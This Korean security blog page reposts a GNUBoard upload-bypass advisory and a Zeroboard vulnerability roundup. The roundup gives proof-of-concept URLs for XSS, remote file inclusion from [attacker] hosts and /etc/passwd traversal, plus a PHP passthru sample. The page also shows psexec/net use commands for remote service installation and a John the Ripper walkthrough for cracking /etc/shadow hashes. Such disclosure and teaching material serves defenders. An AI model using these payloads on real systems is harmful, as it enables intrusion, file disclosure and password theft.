영삼넷IT 강국 = 김영삼 블로그에 오신걸 환영합니다.

http://www.securitytracker.com/alerts/2005/Jan/1012812.html

국내 해커들이 쉬쉬하는 사이....
해외 해커 그룹이 해당 보안 취약점을 발표해버렸습니다.

opt님이 보안 취약점을 열심히 올리시네요.
수고가 많으십니다. santy 웜이 아주 발작을 하는 시점에 무덤덤하네요. 그누보드는 근 한달 사이에 2번째인듯하네요
이젠 보드 사이를 해매고 있는데 이것도 spyki에 바로 올라가겠는데요.
ps. 이젠 무슨 보드를 써야할지 휴우

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

STG Security Advisory: [SSA-20041224-21] File extensions restriction bypass
vulnerability in GNUBoard.

Revision 1.0
Date Published: 2004-12-24 (KST)
Last Update: 2005-01-33
Disclosed by SSR Team (advisory at stgsecurity.com)

Summary
========
GNUBoard is one of widely used web BBS applications in Korea. However, an
input validation flaw can cause malicious attackers to run arbitrary
commands with the privilege of the HTTPD process, which is typically run as
the nobody user.

Vulnerability Class
===================
Implementation Error: Input validation flaw

Impact
======
High : arbitrary command execution.

Affected Products
================
GNUBoard 3.40 and prior

Vendor Status: NOT FIXED
========================
2004-12-09 Vulnerability found
2004-12-09 Vendor contacted and confirmed.
2005-01-03 Official release.

Details
=======
Implementation of check every file extension of upload files is
case-sensitive. Bypassing this mechanism, malicious attackers can upload
arbitrary script files (php, pl, cgi, etc) to a web server.

gbupdate.php (107 line)
- ----
// 실행가능한 스크립트 확장자
$source = array ("/\.php/", "/\.htm/", "/\.cgi/", "/\.pl/");
$target = array (".phpx", ".htmx", ".cgix", ".plx");
- ----

gbupdate.php (142 line)
- ----
// php_x 와 같은 방법으로 스크립트 실행을 하지 못하게 하였으나 abc.php._x
는 실행되는 버그가 있음
$filename = preg_replace($source, $target, $filename);
// 접두사를 붙인 파일명
$upload[$i] = $prefix . $filename;
$dest_file = "./data/file/$bo_table/$upload[$i]";
- ----

malicious attackers can upload [attack].PHP.rar, [attack].pHp.rar, etc.

Solution
=========
modify 108th line of gbupdate.php as following
$source = array ("/\.php/i", "/\.htm/i", "/\.cgi/i", "/\.pl/i");

Vendor URL
==========
http://www.sir.co.kr/

Credits
======
Jeremy Bae at STG Security

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQA/AwUBQdjxDD9dVHd/hpsuEQIfQgCdH1I3gYRYQhM49hOOEKg35puXscUAoK07
zKwL5QKjuY2Nb2yzKAtFwDhJ
=o+Ui
-----END PGP SIGNATURE-----

CVE-2009-0238
Secunia-33954

엑셀의 파일포멧취약점이다.
파일 포멧의 레코드중 특정 필드값이 홀수가 되면 조건문에 의해 특정루틴을 수행한다.

출처 SecurityPlus

게시판만들때 참고하면 많은 도움 됩니다

==============================================================================

안녕하세요. SecurityPlus입니다.

본 자료는 국내 해커 및 보안 강사로 활동 중인 이경태님께서 제공해 주셨습니다.

그럼, 많은 활용 바랍니다.

안녕히 계세요.

제로보드 취약점 총정리  

■ 크로스사이트 스크립팅 취약점(2005.02.19)
The following proof of concept examples are available:
http://www.example.com/zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%
3Cscript%3Ealert(no_no_no_document.cookie)%3C/script%3E

http://www.example.com/zboard.php?
id=union_schdule&year=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert
(no_no_no_document.cookie)%3C/script%3E

http://www.example.com/skin/dir/view_image.php?
filename=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(no_no_no_document.cookie)%
3C/script%3E

http://www.example.com/zboard.php?id=link&page=ALBANIAN%
20RULEZ='%3E%3Cscript%3Ealert(no_no_no_document.cookie)%3C/script%3E

■ Print_Category.PHP 원격 File Include 취약점(2005.01.13)
http://www.example.com/[zeroboard]/include/print_category.php?setup[use_category]=1&dir=http://[attacker]/

■ DIR 파라미터 원격 File Include 취약점(2005.01.13)
The following proof of concept examples are available:
http://www.example.com/skin/zero_vote/error.php?dir=http://[ATTACKER]
http://www.example.com/skin/zero_vote/login.php?dir=http://[attacker]/
http://www.example.com/skin/zero_vote/setup.php?dir=http://[attacker]/
http://www.example.com/skin/zero_vote/ask_password.php?dir=http://[attacker]/

■ 다중 File Disclosure 취약점(2005.01.13)
http://www.example.com/_head.php?_zb_path=../../../../../etc/passwd%00
http://www.example.com/include/write.php?dir=../../../../../etc/passwd%00
http://www.example.com/outlogin.php?_zb_path=../../../../../etc/passwd%00

■ 다중원격 스크립트 삽입과 크로스사이트 스크립팅 취약점(2004.12.24)
http://www.example.com/outlogin.php?_zb_path=ftp://[attacker]/pub/
http://www.example.com/include/write.php?dir=http://[attacker]/
http://www.example.com/check_user_id.php?user_id=<script>alert(no_no_no_document.cookie)</sc
ript>

■ 악성 PHP 삽입(2002.06.14)
We checked the vulnerability with "http://BOARD_URL/_head.php?_zb_path=WANTED_TO_INCLUDE"
and
made a sample code, alib.php,

--------------------alib.php--------------
<? passthru("/bin/ls"); ?>
-----------------------------------------

and type the following URL to invoke this sample code.

TEST URL : http://BOARD_URL/_head.php?_zb_path=http://MYBOX/a"

-------out put----------------------------
_foot.php _head.php admin admin.php admin_sendmail_ok.php admin_setup.php apply_vote.php
check_user_id.php comment_ok.php config.php data del_comment.php del_comment_ok.php
delete.php delete_ok.php download.php error.php icon image_box.php images
include index.html install.php install1.php install2.php install2_ok.php install_ok.php
latest_skin lib.php license.txt list_all.php login.php login_check.php
logout.php lostid.php lostid_search.php member_join.php member_join_ok.php member_memo.php
member_memo2.php member_memo3.php member_modify.php member_modify_ok.php
member_out.php open_window.php outlogin.php outlogin_skin schema.sql script
select_list_all.php send_message.php setup.php skin style.css view.php view_info.php
view_info2.php view_preview.php vote.php write.php write_ok.php zboard.php
zipcode
Fatal error: Call to undefined function: dbconn() in /home/morris/public_html/tmp/bbs/_head.php
on line 41
-----------------------------------------

■ PHP Include File 명령실행 취약점(2002.01.15)
PHP Source file a.php
<? passthru("/bin/ls"); ?>

Accessing URL on vulnerable system:
http://vulnerablesystem/_head.php?_zb_path=http://example.com/a

구글 코드 서치로 PHP 코드 중 SQL Injection 취약점이 있는 코드를 찾는 키워드가 공개되었습니다.

쿼리 : lang:php Where \$_POST -addslashes
쿼리 결과 : http://www.google.com/codesearch?q=+lang:php+Where+%5C%24_POST+-addslashes&sa=N

쿼리를 잘 보시면 PHP 언어 중 Where 와 $_POST 절이 나타나면서 addslashes 함수를 사용하지 않는 코드를 찾고 있는 것을 보실 수 있습니다.

대략 어떤 형식으로 검색을 하는지 아시겟죠?

NT 시스템에 대한 모의 해킹 중 다양한 서비스를 원격 인스톨하는 기법을 사용하는 경우가 있습니다.

기본적인 명령어의 사용법이나 개념 이해를 도울 수 있는 자료가 있기에 올려봅니다.
-

- How may I remotely install RA on a single distant PC?
- You can use a free tool called psexec.exe available from www.sysinternals.com to deploy and run Slave on all the machines of your LAN with a single line of text.

For the ones that want to understand how it works, you need the Administrator account of the distant PC, and the PC must be reachable by TCP/IP.
Open a DOS box and type the following commands:

• NET USE \192.168.112.24IPC$ /user:administrator password
• COPY "C:Slave.exe" "\192.168.112.24C$WinNT (you may have to replace WinNT by Windows)
• NETSVC \192.168.112.24 schedule /start   (make sure that the Scheduler Service is started)
• NET TIME \192.168.112.24                        (note the time of the remote PC)
• AT \192.168.112.24 10:00 "C:Slave.exe"    (replace 10:00 by the time of the PC plus one minute)

That's it! RA is running on the remote PC so you can access it with Master! You can also use the following commands:

• REGINI -m \192.168.112.24  ra.reg             (to install some Registry settings on the remote PC)
• SHUTDOWN \192.168.112.24 /R /Y /C /T:0  (to reboot the remote PC)

There is a LOGON SCRIPT in the PDF Manual to remotely install/Update/Remove RA on remote PCs.

-

출처 : http://www.twd-industries.com/en/faq.htm

정리해 보자면...
1. psexec 를 활용하여 명령어 한번에 원격 서비스 설치 가능
예) psexec \* -u domainadministrator -p password -c -d -i "C:myservice.exe"
       - psexec \192.168.124.145 -u domainmike -p secret -c -d -i "C:myservice.exe"

2. psexec 활용 불가 시
net use \192.168.112.24IPC$ password /user:administrator
copy "C:slave.exe" "\192.168.112.24C$WinNT
netsvc \192.168.112.24 schedule /start
net time \192.168.112.24
at \192.168.112.24 10:00 "C:slave.exe"

or

regini -m \192.168.112.24 ra.reg
shutdown \192.168.112.24 /r /y /c /t:0

이 기법은 원격 VNC 설치에도 즐겨 사용되는 기법입니다.

이는 root의 권한으로 수행되어야 함을 미리 알립니다.

보통 리눅스 시스템에서는 /etc/passwd 파일에 password를 저장했습니다.
하지만, 누구나 읽을 수 있는 /etc/passwd 파일은 해킹의 대상이 되었죠.
따라서, 리눅스 시스템은 /etc/shadow 라는 파일에 암호를 따로 저장합니다.

[root@xxx root]# ls -al /etc/passwd /etc/shadow
-rw-r--r--    1 root     root         2694  5월  9 14:29 /etc/passwd
-r--------    1 root     root         2024  5월  9 14:29 /etc/shadow
[root@xxx root]#

위에 보시면, passwd 파일은 other가 읽을 수 있는 권한이 있음이 보입니다.
하지만, shadow 파일은 root만이 읽을 수 있습니다. 또한, root는 수정도 할수 없지요.

중요한건 root는 읽을 수는 있다는 겁니다. 안그러면 아무 의미가 없겠죠?
아무도 로그인을 못할테니. 아무튼, 중요한건 그게 아니니까...

[root@xxx root]# cat /etc/shadow
....
test1:$1$dxH.pxpU$CpTS86RilpP5xo4igbv88/:12818:0:99991:77:::
test2:$1$ANn54aHO$GALmkrq.xUlCOb2XCNAO2/:12820:0:99991:77:::
....

위에 처럼 실행하면 해당 계정에 대한 암호화된 passwd가 보입니다.
(참고로, 위의 계정은 임의로 수정한겁니다. 크랙해도 머... 의미가... ㅋㅋ)

아무튼, test1을 크랙하고 싶다면, 그 해당 줄을 모두 복사합니다.
암호화된 부분만 가져오시면 안됩니다. (john the ripper는 있어야 함)
개인적인 생각에는 리눅스 시스템 암호화는 계정의 문자열과 그룹 번호 등등을 모두 이용하여 암호화 할지도 모른다는 생각이 드네요.
저두 암호화 쪽은 잘 몰라서 대강 그런 생각이 듭니다.
참고로, mysql 같은 경우에는 계정 문자열과는 상관없이 암호화 합니다.

아무튼, 이를 복사하여 일반 txt 파일로 저장 하면 됩니다.

예) pass.txt
내용 :
test1:$1$dxH.pxpU$CpTS86RilpP5xo4igbv88/:12818:0:99991:77:::

이렇게 저장하면 john the ripper가 crack 할수 있습니다.